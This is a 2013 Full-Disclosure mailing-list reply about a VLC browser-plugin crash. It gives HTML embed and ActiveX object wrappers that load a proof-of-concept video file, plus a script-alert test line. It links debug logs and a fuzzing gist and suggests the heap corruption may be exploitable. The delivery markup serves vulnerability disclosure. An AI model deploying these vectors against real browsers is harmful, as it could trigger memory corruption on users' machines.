[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Full-Disclosure Digest, Vol 101, Issue 10

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 101, Issue 10
From: Sachin Shinde <sachinshinde1102@xxxxxxxxx>
Date: Wed, 10 Jul 2013 17:45:01 +0530

Hi,


Please please please try to understand the attack vectors guys ( please
think all the cases before giving up )

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<html>
<head><title>Demo of VLC mozilla plugin</title></head>

<body>

<h1>Demo of VLC mozilla plugin - Example 1</h1>

<embed type="application/x-vlc-plugin"
         name="video1"
         autoplay="no" loop="yes" width="400" height="300"
         target="poc.mkv" />
<br />
  <a href="javascript:;" onclick='document.video1.play()'>Play video1</a>
  <a href="javascript:;" onclick='document.video1.pause()'>Pause video1</a>
  <a href="javascript:;" onclick='document.video1.stop()'>Stop video1</a>
  <a href="javascript:;"
onclick='document.video1.fullscreen()'>Fullscreen</a>

</body>
</html>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<script>alert(1)</script>
<object
  classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
  codebase="
http://download.videolan.org/pub/videolan/vlc/last/win32/axvlc.cab";
  id="vlc"
  name="vlc"
  class="vlcPlayer"
  events="True">
    <param name="Src" value="poc.mkv" />
    <param name="ShowDisplay" value="True" />
    <param name="AutoLoop" value="True" />
    <param name="AutoPlay" value="True" />
 </object>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now the real problem is plugins are executed outside of the browser process
except IE.


you can use my gist mediafuzz for fuzzing fileformats in browser  (with
little modifications)
https://gist.github.com/cons0ul/2357771

Best,
Sachin Shinde
@cons0ul





On Wed, Jul 10, 2013 at 5:22 PM, Sachin Shinde
<sachinshinde1102@xxxxxxxxx>wrote:

> Finally someone dumping debug logs on FD :)
>
> Heres my debug logs
>
>
> http://paste.ofcode.org/gcRAJB9ixqLKtxDBiyfvWv
> http://paste.ofcode.org/BtL95whhBFDPXiKPeF8ViJ
>
> poc crashes vlc at different addresses ( I have seen 3 different addresses
> so far)
> Looks like heap corruption,can be exploited if vlc plugin crashes in
> browser :)
>
> Cheers,
> Sachin Shinde
> @cons0ul
>

Attachment: vlc_chrome.JPG
Description: JPEG image

Attachment: vlc_firefox.JPG
Description: JPEG image

Attachment: vlc_ie.JPG
Description: JPEG image

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- Re: [Full-disclosure] Full-Disclosure Digest, Vol 101, Issue 10
  - From: Sachin Shinde

Prev by Date: Re: [Full-disclosure] Full-Disclosure Digest, Vol 101, Issue 10
Next by Date: Re: [Full-disclosure] Multiple vulnerabilities found in NSA website
Previous by thread: Re: [Full-disclosure] Full-Disclosure Digest, Vol 101, Issue 10
Next by thread: [Full-disclosure] [Security-news] SA-CONTRIB-2013-056 - Stage File Proxy - Denial of Service
Index(es):
- Date
- Thread